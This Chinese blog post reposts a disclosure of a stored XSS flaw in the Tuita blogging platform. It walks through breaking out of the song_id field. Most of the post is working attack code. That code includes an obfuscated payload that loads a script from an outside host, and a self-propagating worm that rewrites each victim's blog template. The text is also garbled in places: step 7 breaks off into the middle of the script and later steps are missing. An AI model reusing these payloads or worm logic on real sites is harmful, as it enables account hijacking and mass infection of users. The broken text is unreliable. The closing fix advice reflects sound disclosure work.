当前位置: iick's blog > 网站漏洞 > 盛大推她存储型XSS

盛大推她存储型XSS

作者:hack1990 时间:12-09-17 阅读数:576人阅读

Tuita开放了用户页面模板自定义功能,主要操作则限制于www.tuita.com主域名下,因而要寻找该域名下的XSS。

因为在特定标签下,可以展现我们所发布的内容。例如:

我们随便发表一个内容,标签贴上:wooyuntest

那么在,http://www.tuita.com/tagpage/wooyuntest 就可以看到我们发送的内容!

---------------------------------------

如果发布内容存在XSS的话,那么

http://www.tuita.com/tagpage/wooyuntest

页面将会出现XSS,从而被我们利用。

---------------------------------------

抱着这个目的,我们对发布内容进行XSS测试:

1. 首先发布一个正常内容:


2. 抓包,查看发送了什么数据:

地址:http://www.tuita.com/post/create
类型:POST
数据:见图片!


3. 可以看到content是JSON数据格式,当我们向song_id这个属性加入\u0022\u003E进行构造测试时,会发现。。。


4. 结果么,哦和~~ 侧漏了。


知道怎么侧漏~,接着就简单了!

5. 构造闭合代码:


"></object><img/src="upload/201209171717448735.gif"onload="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,105,116,115,111,107,108,97,46,100,117,97,112,112,46,99,111,109,47,106,46,106,115);document.body.appendChild(window.s)"><object><i a="

6. 编码一下,并放入发送数据中。

 

{"PlayerFlashVar":"http:\/\/www.xiami.com\/widget\/0_376013\/singlePlayer.swf","song_id":"376013\u0022\u003e\u003c\u002f\u006f\u0062\u006a\u0065\u0063\u0074\u003e\u003c\u0069\u006d\u0067\u002f\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0062\u0061\u0069\u0064\u0075\u002e\u0063\u006f\u006d\u002f\u0069\u006d\u0067\u002f\u0062\u0061\u0069\u0064\u0075\u005f\u0073\u0079\u006c\u006f\u0067\u006f\u0031\u002e\u0067\u0069\u0066\u0022\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u0073\u003d\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u0072\u0065\u0061\u0074\u0065\u0045\u006c\u0065\u006d\u0065\u006e\u0074\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0031\u0031\u0035\u002c\u0039\u0039\u002c\u0031\u0031\u0034\u002c\u0031\u0030\u0035\u002c\u0031\u0031\u0032\u002c\u0031\u0031\u0036\u0029\u0029\u003b\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u0073\u002e\u0073\u0072\u0063\u003d\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0031\u0030\u0034\u002c\u0031\u0031\u0036\u002c\u0031\u0031\u0036\u002c\u0031\u0031\u0032\u002c\u0035\u0038\u002c\u0034\u0037\u002c\u0034\u0037\u002c\u0031\u0030\u0035\u002c\u0031\u0031\u0036\u002c\u0031\u0031\u0035\u002c\u0031\u0031\u0031\u002c\u0031\u0030\u0037\u002c\u0031\u0030\u0038\u002c\u0039\u0037\u002c\u0034\u0036\u002c\u0031\u0030\u0030\u002c\u0031\u0031\u0037\u002c\u0039\u0037\u002c\u0031\u0031\u0032\u002c\u0031\u0031\u0032\u002c\u0034\u0036\u002c\u0039\u0039\u002c\u0031\u0031\u0031\u002c\u0031\u0030\u0039\u002c\u0034\u0037\u002c\u0031\u0030\u0036\u002c\u0034\u0036\u002c\u0031\u0030\u0036\u002c\u0031\u0031\u0035\u0029\u003b\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u002e\u0061\u0070\u0070\u0065\u006e\u0064\u0043\u0068\u0069\u006c\u0064\u0028\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u0073\u0029\u0022\u003e\u003c\u006f\u0062\u006a\u0065\u0063\u0074\u003e\u003c\u0069\u0020\u0061\u003d\u0022","song_name":"\u56ed\u6e38\u4f1a","artist_id":"\u5468\u6770\u4f26","album_name":"\u4e03\u91cc\u9999","album_logo":{"55":"http:\/\/img.xiami.com\/.\/images\/album\/img60\/1260\/66481314675280_3.jpg","100":"http:\/\/img.xiami.com\/.\/images\/album\/img60\/1260\/66481314675280_1.jpg","185":"http:\/\/img.xiami.com\/.\/images\/album\/img60\/1260\/66481314675280_2.jpg","300":"http:\/\/img.xiami.com\/.\/images\/album\/img60\/1260\/66481314675280_4.jpg"},"audio_info":{"album_logo":null,"description":"<P>ok! look!<\/P>"}}

7. 上面的利用代码,会使得 http://www.tuita.com/template/get?blog_id="+id+"&tsdump="+new Date().getTime(),function  (rs){
   var obj=eval("("+rs+")");
   if(obj.data&&obj.data.tpl_html&&obj.data.tpl_html.indexOf("wooyun")==-1){
    //说明还没有被感染~~
    obj.data.tpl_html=obj.data.tpl_html.replace(/<\/body>/,"<iframe src=\"http://www.tuita.com/tagpage/test\" style=\"display:none\" id=\"wooyun\"></iframe></body>");
    saveSetting(id,obj);
   }else{
    try{
     console.log("done!");
    }catch(e){}
   }
  });
 }
 function saveSetting(id,obj){
  pkav.post("http://www.tuita.com/template/save","blog_id="+id+"&theme=0&custom_vars=%5B%7B%22name%22%3A%22%5Cu5c55%5Cu793a%5Cu5934%5Cu50cf%22%2C%22group%22%3A%22%5Cu8bbe%5Cu7f6e%22%2C%22type%22%3A%22boolean%22%2C%22value%22%3Atrue%2C%22reset%22%3Atrue%7D%2C%7B%22name%22%3A%22%5Cu5c55%5Cu793a%5Cu6211%5Cu5173%5Cu6ce8%5Cu7684%5Cu535a%5Cu5ba2%22%2C%22group%22%3A%22%5Cu8bbe%5Cu7f6e%22%2C%22type%22%3A%22boolean%22%2C%22value%22%3Atrue%2C%22reset%22%3Atrue%7D%2C%7B%22name%22%3A%22%5Cu5c55%5Cu793a%5Cu641c%5Cu7d22%5Cu6846%22%2C%22group%22%3A%22%5Cu8bbe%5Cu7f6e%22%2C%22type%22%3A%22boolean%22%2C%22value%22%3Atrue%2C%22reset%22%3Atrue%7D%5D&system_vars=%7B%22pagination_limit%22%3A%2210%22%7D&tpl_html="+encodeURIComponent(obj.data.tpl_html)+"&contribute_type=&contribute_tags=&contribute_rules=&contribute_save=1",function  (rs){
   try{
    console.log("ok!");
   }catch(e){}
  });
 }
 function getID(){
  pkav.get("http://www.tuita.com/home?hash="+Math.random(),function(rs){
   var id=pkav.fetch(rs,/http:\/\/www\.tuita\.com\/blogsetting\/(\d+)/);
   getSetting(id);
   //createPost(id);
  });
 }
 if(!window.___x){
  getID();
  window.___x=1;
 }
}

11. 漏洞效果见证明!

漏洞证明:
当受害者以登录态, 访问http://1881056377.tuita.com/之后,自己的博客也会被感染!

访问以上地址的受害者,博客页面也插入了恶意代码,见下图:


 

修复方案:
对post_content里song_id以及其它参数(未测试,但可能存在相同问题)的内容加以过滤。

 

# Nmap Security Scanner 7.0

上一篇:搜狗手机输入法网站SQL注入漏洞

下一篇:随手记任意文件上传漏洞

相关文章

发表评论